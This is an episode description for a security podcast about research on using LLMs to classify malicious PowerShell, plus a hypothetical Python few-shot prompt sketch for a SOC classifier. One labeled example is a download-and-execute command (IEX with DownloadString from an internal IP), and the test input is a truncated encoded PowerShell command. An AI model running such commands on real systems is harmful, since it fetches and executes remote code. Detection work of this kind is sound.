Teaching LLMs to spot malicious PowerShell scripts

Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can help security operations center (SOC) analysts identify malicious PowerShell scripts. Ryan walks us through three distinct approaches, from teaching LLMs through examples, to retrieval-augmented generation, to fine-tuning specialized models, each with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
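To give a flavor of the first approach (teaching an LLM through examples, often called few-shot prompting), here is a minimal, hypothetical sketch that assembles a chat prompt from labeled PowerShell snippets before asking the model to classify a new script. It is not taken from Ryan's research: the example scripts, their labels, and the build_fewshot_messages helper are illustrative assumptions, and the resulting message list could be sent to any chat-style LLM API.

```python
from typing import Dict, List

# Hypothetical labeled examples: short PowerShell snippets paired with a verdict.
# A real few-shot setup would draw these from a curated, vetted corpus.
FEWSHOT_EXAMPLES = [
    (
        "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')",
        "malicious",
    ),
    (
        "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object",
        "benign",
    ),
]

SYSTEM_PROMPT = (
    "You are a SOC assistant. Classify each PowerShell script as 'malicious' "
    "or 'benign' and give a one-sentence justification."
)


def build_fewshot_messages(script: str) -> List[Dict[str, str]]:
    """Assemble a chat-style message list: system prompt, labeled examples,
    then the script to classify. Compatible with chat-completions-style APIs."""
    messages = [{"role": "system", "content": SYSTEM_PROMPT}]
    for example_script, verdict in FEWSHOT_EXAMPLES:
        messages.append({"role": "user", "content": f"Script:\n{example_script}"})
        messages.append({"role": "assistant", "content": verdict})
    messages.append({"role": "user", "content": f"Script:\n{script}"})
    return messages


if __name__ == "__main__":
    # Hypothetical suspicious input: an encoded PowerShell command (truncated).
    suspicious = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA..."
    for message in build_fewshot_messages(suspicious):
        print(f"[{message['role']}] {message['content']}")
```

The retrieval-augmented generation and fine-tuning approaches discussed in the episode would build on the same classification task, but with retrieved security context or a specialized model in place of hard-coded examples; see the linked Splunk blog post for the actual methods and results.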
